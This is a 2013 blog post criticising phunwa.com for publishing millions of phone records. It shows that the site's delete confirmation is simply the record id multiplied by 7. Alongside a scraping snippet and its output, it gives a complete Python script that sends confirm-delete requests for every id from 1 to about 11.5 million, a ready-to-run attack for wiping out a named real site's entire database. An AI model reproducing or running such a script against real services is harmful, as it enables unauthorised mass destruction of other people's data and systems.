Friday 22 March 2013

Analysis of a Bad web-app

Alright, I can't really call this an app, it's more like a search engine ... that allows you delete its records.

 
 This website pissed me off as it makes ~11.5 million telephone records and related information(name,address) publicly searchable and indexable. I guess Google has already indexed all of the pages, and even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I can go on about how this is a privacy issue but I'll leave that for another post.

 

 There's a tiny delete button at the bottom that takes you to such a page.

 
 There's an id parameter (passed through the content body) associated with each telephone record, which I suppose is the database id of the record. The numbers of the equation are a textual part of the DOM and can be scraped to automate deletion of a record. I wrote a Python script to parse the HTML using regex and retrieve those numbers:

    equation = re.compile('([0-9]*[0-9]+)\ \+\ ([0-9]*[0-9]+)')
    p_url = 'http://www.phunwa.com/removeentry/'

    for counter in range(800000,800005):
        params = {
            'id':counter,
            'Remove this entry':'Remove this number from the site'
            }
        req = urllib2.Request(url=p_url,data=urllib.urlencode(params))
        phunwa = urllib2.urlopen(req)
        source = phunwa.read()
        numbers = equation.findall(source)
        for num in numbers:
            print "id: %s | %s + %s = %s" % \
            ((counter,num[0],num[1],(int(num[0])+int(num[1]))))



Which gives the following output:

id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028



For each increment of the id, the answer increments by 7(even though the two numbers themselves are generated different each time) which can only mean one thing:

Whoever designed this thing never heard of re-captcha. It doesn't even verify if the referrer(which is the URL containing the phone-number associated with the id) is correct, but that's too much to ask for considering the confirmation method they chose to implement is answer = id*7

The total number of records could be around 11,547,208. That's the highest the id goes to before returning a 500. In theory, it is thus possible to delete every record on Phunwa.com without user-intervention at any point. Except for hiring an EC2 instance and running this script.

import re
import urllib
import urllib2

def annihilate_phunwa():
  p_url = 'http://www.phunwa.com/confirmdelete/'

  for counter in range(1,11547209):
    params = {
      'id':counter,
      'answer' : (counter*7),
      'Confirm Delete' : 'Submit Query'
      }
    try:
      req = urllib2.Request(url=p_url,data=urllib.urlencode(params))
      phunwa = urllib2.urlopen(req)
    except urllib2.HTTPError,e:
      if e.hdrs['Status'] == '500':
        print 'id=%s may already be deleted!' % ((counter,))
      else: print 'Something else has gone wrong!'

annihilate_phunwa()



I may update this code with one that implements threading.

No comments:

Post a Comment